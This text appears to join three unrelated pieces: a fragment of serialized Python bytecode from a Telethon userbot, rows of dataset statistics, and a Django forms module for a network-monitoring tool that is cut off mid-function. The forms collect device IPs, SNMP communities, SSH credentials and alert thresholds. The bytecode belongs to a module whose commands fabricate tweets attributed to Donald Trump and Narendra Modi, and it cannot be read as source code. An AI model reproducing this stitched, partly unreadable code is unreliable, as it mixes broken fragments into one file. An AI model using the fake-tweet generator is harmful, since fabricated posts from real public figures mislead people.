|$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tNr6\x00\x00\x00z&Send you text to modi so he can tweet.z&send you text to modi so he can tweet.z\x1bRequesting modi to tweet...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r+\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xae\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x10^.cmm(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x04\xa1\x01\x83\x01d\x05d\x06\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x07\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x08Nr6\x00\x00\x00z%Give text for to write on banner, manz+Your banner is under creation wait a sec...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r\'\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xca\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x12^.kanna(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00s\xfe\x00\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01|\x00j\x02}\x02|\x00j\x03r&|\x00\xa0\x04\xa1\x00I\x00d\x00H\x00}\x02|\x01sh|\x00j\x05rT|\x02j\x06s>|\x02j\x02}\x01qh|\x00\xa0\x07d\x02\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\x07d\x03\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00|\x00\xa0\x07d\x04\xa1\x01I\x00d\x00H\x00\x01\x00z*t\x08t\t\xa0\nd\x05\xa1\x01\x83\x01d\x06d\x07\x85\x02\x19\x00}\x03|\x00\xa0\x0b|\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00n\x0c\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00t\x0c|\x01\x83\x01}\x01t\r|\x01\x83\x01I\x00d\x00H\x00}\x04|\x00j\x0bj\x0e|\x00j\x0f|\x04|\x02d\x08\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\tNr6\x00\x00\x00z"what should kanna write give text z!what should kanna write give textz\x1dKanna is writing your text...r7\x00\x00\x00r8\x00\x00\x00r9\x00\x00\x00r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rE\x00\x00\x00r\x12\x00\x00\x00r)\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00rI\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00rK\x00\x00\x00\xe6\x00\x00\x00s.\x00\x00\x00\x00\x02\x0c\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x10\x01\x02\x01\x16\x01\x14\x01\x06\x01\x06\x01\x08\x01\x0e\x01\x1a\x01\x0e\x01z\x12\\.tweet(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00s\x06\x01\x00\x00|\x00j\x00\xa0\x01d\x01\xa1\x01}\x01t\x02\xa0\x03d\x02d\x03|\x01\xa1\x03}\x01|\x00j\x04}\x02|\x00j\x05r4|\x00\xa0\x06\xa1\x00I\x00d\x00H\x00}\x02|\x01sv|\x00j\x07rb|\x02j\x08sL|\x02j\x04}\x01qv|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00n\x14|\x00\xa0\td\x05\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00d\x06|\x01k\x06r\x8e|\x01\xa0\nd\x06\xa1\x01\\\x02}\x03}\x01n\x10|\x00\xa0\td\x04\xa1\x01I\x00d\x00H\x00\x01\x00|\x00\xa0\td\x07|\x03\x9b\x00d\x08\x9d\x03\xa1\x01I\x00d\x00H\x00\x01\x00t\x0b|\x01\x83\x01}\x01t\x0c|\x01|\x03\x83\x02I\x00d\x00H\x00}\x04|\x00j\rj\x0e|\x00j\x0f|\x04|\x02d\t\x8d\x03I\x00d\x00H\x00\x01\x00|\x00\xa0\x10\xa1\x00I\x00d\x00H\x00\x01\x00t\x11\x83\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\nNr6\x00\x00\x00rL\x00\x00\x00r\x0e\x00\x00\x00z4`What should i tweet? Give your username and tweet!`z3What should i tweet? Give your username and tweet!`\xda\x01.z\x0c`Requesting z\r to tweet...`r:\x00\x00\x00)\x12r;\x00\x00\x00r<\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00r\x13\x00\x00\x00r=\x00\x00\x00r>\x00\x00\x00r?\x00\x00\x00r@\x00\x00\x00rA\x00\x00\x00\xda\x05splitr\x12\x00\x00\x00r/\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00r3\x00\x00\x00)\x05rM\x00\x00\x00r \x00\x00\x00rJ\x00\x00\x00Z\x08usernamer%\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x05tweet\x02\x01\x00\x00s,\x00\x00\x00\x00\x02\x0c\x01\x0e\x01\x06\x01\x06\x01\x0e\x01\x04\x01\x06\x01\x06\x01\x08\x02\x10\x01\x06\x02\x10\x01\x04\x01\x08\x01\x10\x02\x10\x01\x18\x01\x08\x01\x10\x01\x1a\x01\x0e\x01rQ\x00\x00\x00a[\x01\x00\x00>`.tweet` <username>.<tweet>\nUsage: Create tweet with custom username.\n\n>`.trump` <tweet>\nUsage: Create tweet for Donald Trump.\n\n>`.modi` <tweet>\nUsage: Create tweet for Narendra Modi.\n\n>`.qg` <tweet>\nUsage: Create tweet for `@QoryGore`.\n\n>`.cmm` <text>\nUsage: Create banner for Change My Mind.\n\n>`.kanna` <text>\nUsage: Kanna is writing your text.)&Z\x06randomr\x02\x00\x00\x00Z\x07asyncior\x03\x00\x00\x00Z\x08telethonr\x04\x00\x00\x00Z\x0euserbot.eventsr\x05\x00\x00\x00\xda\x04timer\x1b\x00\x00\x00r0\x00\x00\x00r\x0f\x00\x00\x00r\x06\x00\x00\x00Z\x03bs4r\x07\x00\x00\x00Z\x05emojir\x08\x00\x00\x00Z\x03PILr\t\x00\x00\x00Z\x0evalidators.urlr\n\x00\x00\x00Z\x07userbotr\x0b\x00\x00\x00\xda\x07compiler\x10\x00\x00\x00rB\x00\x00\x00r\x12\x00\x00\x00r&\x00\x00\x00r\'\x00\x00\x00r)\x00\x00\x00r+\x00\x00\x00r.\x00\x00\x00r/\x00\x00\x00r3\x00\x00\x00rK\x00\x00\x00rN\x00\x00\x00rQ\x00\x00\x00\xda\x06updater\x11\x00\x00\x00r\x11\x00\x00\x00r\x11\x00\x00\x00r\x0e\x00\x00\x00\xda\x08<module>\x02\x00\x00\x00sR\x00\x00\x00\x08\x01\x0c\x02\x08\x01\x0c\x01\x0c\x01\x0c\x01\x08\x01\x18\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x03\x04\x01\x02\xff\x04\x10\x10\x04\x08\r\x08\r\x08\r\x08\r\x08\x0e\x08\r\x08\x08\n\x01\n\x1b\n\x01\n\x13\n\x01\n\x1b\n\x01\n\x1b\n\x01\n\x1b\n\x01\n\x1c\x04\x02\x02\x00\x02\xff\x02\xff'))
| 4,819.75
| 19,208
| 0.752269
| 4,221
| 19,279
| 3.432125
| 0.104004
| 0.264237
| 0.155933
| 0.120936
| 0.729965
| 0.696625
| 0.68558
| 0.667288
| 0.658245
| 0.650652
| 0
| 0.36572
| 0.00861
| 19,279
| 4
| 19,208
| 4,819.75
| 0.392246
| 0.002697
| 0
| 0
| 0
| 1.5
| 0.614949
| 0.345158
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
0d2d9b28d23caf4f0152fa59ac66ce02dcb8f16d
| 31,554
|
py
|
Python
|
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | 1
|
2020-04-03T07:34:47.000Z
|
2020-04-03T07:34:47.000Z
|
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | null | null | null |
devnet2019/forms.py
|
snowtrain/network-ops
|
fc439c0531258be545f31964e195cadde479734e
|
[
"MIT"
] | null | null | null |
from django import forms
from django.core.validators import RegexValidator
from devnet2019.models import Devicetype, Devicedb, FieldTypeMap, ApplicationMap
# 添加设备类型
class AddDeviceType(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
# 设备类型名称
device_type_name = forms.CharField(label='设备类型名称',
widget=forms.TextInput(attrs={"class": "form-control"}))
# CPU利用率
cpu_usage = forms.CharField(label='CPU利用率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 内存使用
mem_usage = forms.CharField(label='内存使用 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 内存闲置
mem_free = forms.CharField(label='内存闲置 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口名称
if_name = forms.CharField(label='接口名称 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口速率
if_speed = forms.CharField(label='接口速率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口状态
if_state = forms.CharField(label='接口状态 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口入向字节数
if_in_bytes = forms.CharField(label='接口入向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口出向字节数
if_out_bytes = forms.CharField(label='接口出向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_device_type_name(self):
device_type_name = self.cleaned_data['device_type_name']
try:
Devicetype.objects.get(type_name=device_type_name)
raise forms.ValidationError("设备类型已存在!")
except Devicetype.DoesNotExist:
return device_type_name
# 编辑设备类型
class EditDeviceType(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
device_id = forms.IntegerField(label='设备类型ID',
required=True,
widget=forms.TextInput(attrs={"class": "form-control", 'readonly': True}))
# 设备类型名称
device_type_name = forms.CharField(label='设备类型名称',
widget=forms.TextInput(attrs={"class": "form-control"}))
# CPU利用率
cpu_usage = forms.CharField(label='CPU一分钟利用率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 内存使用
mem_usage = forms.CharField(label='内存使用 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 内存闲置
mem_free = forms.CharField(label='内存闲置 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口名称
if_name = forms.CharField(label='接口名称 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口速率
if_speed = forms.CharField(label='接口速率 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口状态
if_state = forms.CharField(label='接口状态 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口入向字节数
if_in_bytes = forms.CharField(label='接口入向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
# 接口出向字节数
if_out_bytes = forms.CharField(label='接口出向字节数 OID',
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_device_type_name(self):
device_type_name = self.cleaned_data['device_type_name']
device_id = self.cleaned_data['device_id']
try:
if device_id != Devicetype.objects.get(type_name=device_type_name).id:
raise forms.ValidationError("设备类型已存在!")
else:
return device_type_name
except Devicetype.DoesNotExist:
return device_type_name
# 添加设备表单
class AddDevice(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
name = forms.CharField(max_length=100,
min_length=2,
label='设备名称',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
# 类型为GenericIPAddressField,可以对输入的IP地址进行校验
ip = forms.GenericIPAddressField(required=True,
label='IP地址',
widget=forms.TextInput(attrs={"class": "form-control"}))
description = forms.CharField(label="设备描述",
required=False,
# 输入为Textarea,支持多行输入,"rows": 3 控制展示的行数
widget=forms.Textarea(attrs={"class": "form-control", "rows": 3}))
# 选择的设备类型
type_choices = []
devicetype = Devicetype.objects.all()
for x in devicetype:
type_choices.append([x.id, x.type_name])
type = forms.CharField(label='设备类型',
required=True,
widget=forms.Select(choices=type_choices,
attrs={"class": "form-control"}))
TRUE_FALSE_CHOICES = ((True, 'Yes'), (False, 'No'))
snmp_enable = forms.ChoiceField(label='是否激活SNMP',
required=True,
choices=TRUE_FALSE_CHOICES,
initial=False,
widget=forms.Select(attrs={"class": "required checkbox form-control"}))
community_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="SNMP community 只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
snmp_ro_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP只读',
required=True,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
snmp_rw_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP读写',
required=False,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
username_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="用户名只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_username = forms.CharField(max_length=100,
min_length=2,
label='SSH用户名',
required=True,
validators=[username_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_password = forms.CharField(max_length=100,
min_length=2,
label='SSH密码',
required=True,
validators=[password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
enable_password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="特权密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
enable_password = forms.CharField(max_length=100,
min_length=2,
label='特权密码',
required=False,
validators=[enable_password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
# 校验设备名称不能重复, 在此系统中,设备并没有指定唯一ID,设备名就是唯一ID,不能重复
def clean_name(self):
name = self.cleaned_data['name'] # 提取客户输入的设备名
# 在数据库中查找是否存在这个设备名,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
existing = Devicedb.objects.filter(name=name).exists()
# 如果存在就显示校验错误信息
if existing:
raise forms.ValidationError("设备名不能重复")
# 如果校验成功就返回设备名
return name
# 校验IP地址不能重复
def clean_ip(self):
ip = self.cleaned_data['ip'] # 提取客户输入的设备IP
# 在数据库中查找是否存在这个设备IP
existing = Devicedb.objects.filter(
ip=ip
).exists()
# 如果存在就显示校验错误信息
if existing:
raise forms.ValidationError("设备IP不能重复")
# 如果校验成功就返回设备IP
return ip
# 确认激活SNMP,才能设置只读Community
def clean_snmp_ro_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_ro_community = self.cleaned_data['snmp_ro_community']
if snmp_enable == 'True' and snmp_ro_community:
return snmp_ro_community
else:
raise forms.ValidationError("设置只读Community之前请激活SNMP")
# 确认激活SNMP,才能设置读写Community
def clean_snmp_rw_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_rw_community = self.cleaned_data['snmp_rw_community']
if snmp_rw_community:
if snmp_enable == 'True' and snmp_rw_community:
return snmp_rw_community
else:
raise forms.ValidationError("设置读写Community之前请激活SNMP")
else:
return snmp_rw_community
# 修改设备表单
class EditDevice(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
id = forms.IntegerField(label='设备ID',
required=True,
widget=forms.TextInput(attrs={"class": "form-control", 'readonly': True}))
name = forms.CharField(max_length=100,
min_length=2,
label='设备名称',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
# 类型为GenericIPAddressField,可以对输入的IP地址进行校验
ip = forms.GenericIPAddressField(required=True,
label='IP地址',
widget=forms.TextInput(attrs={"class": "form-control"}))
description = forms.CharField(label="设备描述",
required=False,
# 输入为Textarea,支持多行输入,"rows": 3 控制展示的行数
widget=forms.Textarea(attrs={"class": "form-control", "rows": 3}))
# 选择的设备类型
type_choices = []
devicetype = Devicetype.objects.all()
for x in devicetype:
type_choices.append([x.id, x.type_name])
type = forms.CharField(label='设备类型',
required=True,
widget=forms.Select(choices=type_choices,
attrs={"class": "form-control"}))
TRUE_FALSE_CHOICES = ((True, 'Yes'), (False, 'No'))
snmp_enable = forms.ChoiceField(label='是否激活SNMP',
required=True,
choices=TRUE_FALSE_CHOICES,
initial=False,
widget=forms.Select(attrs={"class": "required checkbox form-control"}))
community_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="SNMP community 只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
snmp_ro_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP只读',
required=True,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
snmp_rw_community = forms.CharField(max_length=100,
min_length=2,
label='SNMP读写',
required=False,
validators=[community_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
username_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="用户名只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_username = forms.CharField(max_length=100,
min_length=2,
label='SSH用户名',
required=True,
validators=[username_regex],
widget=forms.TextInput(attrs={"class": "form-control"}))
password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
ssh_password = forms.CharField(max_length=100,
min_length=2,
label='SSH密码',
required=True,
validators=[password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
enable_password_regex = RegexValidator(regex=r'[0-9a-zA-Z~!@#$%^&*()_+=,./]+',
message="特权密码只能包含数字,小写,大写字母 ~!@#$%^&*()_+=,./")
enable_password = forms.CharField(max_length=100,
min_length=2,
label='特权密码',
required=False,
validators=[enable_password_regex],
widget=forms.PasswordInput(attrs={"class": "form-control"}))
# # 校验设备名称不能重复, 在此系统中,设备并没有指定唯一ID,设备名就是唯一ID,不能重复
# def clean_name(self):
# name = self.cleaned_data['name'] # 提取客户输入的设备名
# # 在数据库中查找是否存在这个设备名,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
# existing = Devicedb.objects.filter(name=name).exists()
# # 如果存在就显示校验错误信息
# if existing:
# raise forms.ValidationError("设备名不能重复")
# # 如果校验成功就返回设备名
# return name
# 确认激活SNMP,才能设置只读Community
def clean_snmp_ro_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_ro_community = self.cleaned_data['snmp_ro_community']
if snmp_enable == 'True' and snmp_ro_community:
return snmp_ro_community
else:
raise forms.ValidationError("设置只读Community之前请激活SNMP")
# 确认激活SNMP,才能设置读写Community
def clean_snmp_rw_community(self):
snmp_enable = self.cleaned_data['snmp_enable']
snmp_rw_community = self.cleaned_data['snmp_rw_community']
if snmp_rw_community:
if snmp_enable == 'True' and snmp_rw_community:
return snmp_rw_community
else:
raise forms.ValidationError("设置读写Community之前请激活SNMP")
else:
return snmp_rw_community
# 系统设置, 监控周期表单
class SysconfigmonitorintervalForm(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
interval_regex = RegexValidator(regex=r'^\d{1,2}$',
message="监控周期只能支持最多2位整数")
# CPU监控周期
cpu_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='CPU监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU最大值计算周期
cpu_max_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='CPU最大值计算周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 内存监控周期
mem_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='内存监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 内存最大值计算周期
mem_max_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='内存最大值计算周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 速率监控周期
speed_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='接口速率监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 利用率监控周期
utilization_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=2,
label='接口利用率监控周期(单位小时,默认1小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 系统设置, 数据库监控周期表单
class SysconfigdatabaselifetimeForm(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
interval_regex = RegexValidator(regex=r'^\d{1,3}$',
message="数据老化时间只能支持最多3位整数")
# 可达性数据老化时间
reachable_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='可达性数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU数据老化时间
cpu_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='CPU数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 内存数据老化时间
mem_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='内存数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 接口数据老化时间
interface_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='接口数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# Netflow数据老化时间
netflow_lifetime = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=3,
label='Netflow数据老化时间(单位小时,默认24小时)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 系统设置, 告警阈值,周期与SMTP相关表单
class Sysconfigthreshold(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
threshold_regex = RegexValidator(regex=r'^1?\d{1,2}$',
message="阈值取值范围为1-100的整数")
interval_regex = RegexValidator(regex=r'^\d{1,2}$',
message="监控周期只能支持最多2位整数")
# CPU告警阈值
cpu_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='CPU告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# CPU告警周期
cpu_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='CPU告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 内存告警阈值
mem_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='内存告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 内存告警周期
mem_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='内存告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 接口利用率告警阈值
utilization_threshold = forms.CharField(validators=[threshold_regex],
min_length=1,
max_length=3,
label='接口利用率告警阈值(单位%)设置为0表示取消',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# 接口利用率告警周期
utilization_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='接口利用率告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# SNMP告警周期
snmp_alarm_interval = forms.CharField(validators=[interval_regex],
min_length=1,
max_length=5,
label='SNMP告警周期(单位分钟)',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
# SMTP邮件服务器
mailserver = forms.CharField(min_length=1,
max_length=50,
label='邮件服务器',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# SMTP认证用用户名
mailusername = forms.CharField(min_length=1,
max_length=50,
label='用户名',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# SMTP认证用密码
mailpassword = forms.CharField(min_length=1,
max_length=50,
label='密码',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# 发件人
mailfrom = forms.CharField(min_length=1,
max_length=50,
label='发件人FROM',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
# 收件人
mailto = forms.CharField(min_length=1,
max_length=50,
label='收件人TO',
required=False,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_cpu_alarm_interval(self):
cpu_threshold = int(self.cleaned_data['cpu_threshold'])
cpu_alarm_interval = int(self.cleaned_data['cpu_alarm_interval'])
